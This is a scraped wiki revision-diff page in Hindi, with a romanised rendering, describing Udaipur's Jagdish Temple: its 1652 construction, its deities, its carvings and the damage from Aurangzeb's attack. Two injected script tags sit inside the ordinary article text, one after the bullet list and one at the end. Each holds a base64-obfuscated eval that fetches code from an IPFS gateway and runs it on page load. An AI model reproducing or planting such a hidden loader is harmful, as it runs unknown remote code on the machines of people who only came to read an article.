Difference between revisions of "जगदीश मंदिर उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 1: Line 1:
 
[[चित्र:Jagdish-Temple-Udaipur.jpg|thumb|250px|जगदीश मंदिर, [[उदयपुर]]<br /> Jagdish Temple, Udaipur]]
 
[[चित्र:Jagdish-Temple-Udaipur.jpg|thumb|250px|जगदीश मंदिर, [[उदयपुर]]<br /> Jagdish Temple, Udaipur]]
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
+
*जगदीश मंदिर [[राजस्थान]] राज्य के [[उदयपुर]] में स्थित है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
*इस मंदिर में [[विष्णु]] तथा [[जगन्नाथ]] जी की मूर्तियाँ स्‍थापित है।
+
*जगदीश मंदिर में [[विष्णु]] तथा [[जगन्नाथ]] जी की मूर्तियाँ स्‍थापित है।
 
*महाराणा [[जगतसिंह]] ने सन्1652ई. में इस भव्य मंदिर का निर्माण किया था।  
 
*महाराणा [[जगतसिंह]] ने सन्1652ई. में इस भव्य मंदिर का निर्माण किया था।  
 
*यह मंदिर एक ऊँचे स्थान पर निर्मित है।  
 
*यह मंदिर एक ऊँचे स्थान पर निर्मित है।  
Line 7: Line 7:
 
*[[औरंगजेब]] की चढ़ाई के समय गजथर के कई [[हाथी]] तथा बाहरी द्वार के पास का कुछ भाग आक्रमणकारियों ने तोड़ डाला था, जो फिर नया बनाया गया।  
 
*[[औरंगजेब]] की चढ़ाई के समय गजथर के कई [[हाथी]] तथा बाहरी द्वार के पास का कुछ भाग आक्रमणकारियों ने तोड़ डाला था, जो फिर नया बनाया गया।  
 
*खंडित हाथियों की पंक्ति में भी नये हाथियों को यथास्थान लगा दिया गया है।
 
*खंडित हाथियों की पंक्ति में भी नये हाथियों को यथास्थान लगा दिया गया है।
 +
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति  
 
{{लेख प्रगति  
Line 17: Line 18:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]Category:उदयपुर]]__INDEX__

Revision as of 07:56, 6 February 2011

[[chitr:Jagdish-Temple-Udaipur.jpg|thumb|250px|jagadish mandir, udayapur
Jagdish Temple, Udaipur]]

  • jagadish mandir rajasthan rajy ke udayapur mean sthit hai aur udayapur paryatan ka sabase akarshak sthal mana jata hai.
  • jagadish mandir mean vishnu tatha jagannath ji ki moortiyaan sh‍thapit hai.
  • maharana jagatasianh ne sanh1652ee. mean is bhavy mandir ka nirman kiya tha.
  • yah mandir ek ooanche sthan par nirmit hai.
  • isake bahy hissoan mean charoan taraph atyant sundar naqqashi ka kam kiya gaya hai, jisamean gajathar, ashvathar tatha sansarathar ko pradarshit kiya gaya hai.
  • aurangajeb ki chadhaee ke samay gajathar ke kee hathi tatha bahari dvar ke pas ka kuchh bhag akramanakariyoan ne to d dala tha, jo phir naya banaya gaya.
  • khandit hathiyoan ki pankti mean bhi naye hathiyoan ko yathasthan laga diya gaya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>Category:udayapur]]